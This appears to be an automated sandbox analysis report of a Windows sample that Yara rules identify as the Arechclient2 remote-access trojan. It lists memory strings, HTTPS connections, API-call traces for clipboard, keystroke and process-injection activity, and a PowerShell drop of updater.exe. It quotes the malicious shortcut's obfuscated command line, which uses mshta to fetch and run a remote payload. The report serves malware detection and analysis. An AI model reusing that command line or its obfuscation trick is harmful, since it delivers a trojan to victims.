Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D0DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJXIhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKXIhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CE87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D00C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPzHhLsGI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9E121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.irs.
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9E8B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.irs.gov
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9E121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.irs.gov/pub/irs-pdf/i1040g
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.irs.gov/pub/irs-pdf/i1040gi.pdf
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9E121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.irs.gov/pub/irs-pdf/i1040gi.pdfp

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.100:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.7:50014 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C24632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

27_2_00C24632

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C24830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		27_2_00C24830
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003B4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		29_2_003B4830

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

27_2_00C24632

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C10508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

27_2_00C10508

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C3D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		27_2_00C3D164
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003CD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		29_2_003CD164

Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_017C63B9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,

27_2_017C63B9

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7720.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 33.3.AutoIt3.exe.5dc5d6c.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: fsg5PWtTm2.lnk

LNK file: -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" .

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9841 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,		27_2_017C9841
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B9779 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,		29_2_018B9779

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C142D5: CreateFileW,DeviceIoControl,CloseHandle,

27_2_00C142D5

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C08F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

27_2_00C08F2E

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C15778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		27_2_00C15778
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		29_2_003A5778

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAB533F0E	16_2_00007FFAAB533F0E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAB535881	16_2_00007FFAAB535881
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BBB020	27_2_00BBB020
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BB1663	27_2_00BB1663
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BB9C80	27_2_00BB9C80
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD23F5	27_2_00BD23F5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C38400	27_2_00C38400
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE6502	27_2_00BE6502
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BBE6F0	27_2_00BBE6F0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE265E	27_2_00BE265E
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD282A	27_2_00BD282A
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE89BF	27_2_00BE89BF
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE6A74	27_2_00BE6A74
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C30A3A	27_2_00C30A3A
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BC0BE0	27_2_00BC0BE0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C0EDB2	27_2_00C0EDB2
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDCD51	27_2_00BDCD51
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C30EB7	27_2_00C30EB7
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C18E44	27_2_00C18E44
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE6FE6	27_2_00BE6FE6
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD33B7	27_2_00BD33B7
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BB94E0	27_2_00BB94E0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDF409	27_2_00BDF409
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BCD45D	27_2_00BCD45D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD16B4	27_2_00BD16B4
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BBF6A0	27_2_00BBF6A0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BCF628	27_2_00BCF628
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD78C3	27_2_00BD78C3
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD1BA8	27_2_00BD1BA8
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDDBA5	27_2_00BDDBA5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BE9CE5	27_2_00BE9CE5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BCDD28	27_2_00BCDD28
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDBFD6	27_2_00BDBFD6
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD1FC0	27_2_00BD1FC0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9199	27_2_017C9199
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9192	27_2_017C9192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273C880	28_2_0273C880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_02731070	28_2_02731070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273B01F	28_2_0273B01F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273D110	28_2_0273D110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_027315E0	28_2_027315E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273BD78	28_2_0273BD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273C862	28_2_0273C862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273A8F9	28_2_0273A8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273A908	28_2_0273A908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_02731060	28_2_02731060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273D0F3	28_2_0273D0F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273B09E	28_2_0273B09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_027315C3	28_2_027315C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0273BD76	28_2_0273BD76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621C5E0	28_2_0621C5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621F5F8	28_2_0621F5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621DA20	28_2_0621DA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621CAEE	28_2_0621CAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621EBE7	28_2_0621EBE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_062189EF	28_2_062189EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06216666	28_2_06216666
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06216680	28_2_06216680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06213D35	28_2_06213D35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06214D61	28_2_06214D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06214D70	28_2_06214D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621C5D2	28_2_0621C5D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06217A18	28_2_06217A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06212A18	28_2_06212A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06212A60	28_2_06212A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06212A51	28_2_06212A51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06215828	28_2_06215828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06215817	28_2_06215817
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_0621001F	28_2_0621001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06210040	28_2_06210040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_062170D8	28_2_062170D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06216148	28_2_06216148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06216158	28_2_06216158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_062139B1	28_2_062139B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06214980	28_2_06214980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_062139C0	28_2_062139C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B17620	28_2_06B17620
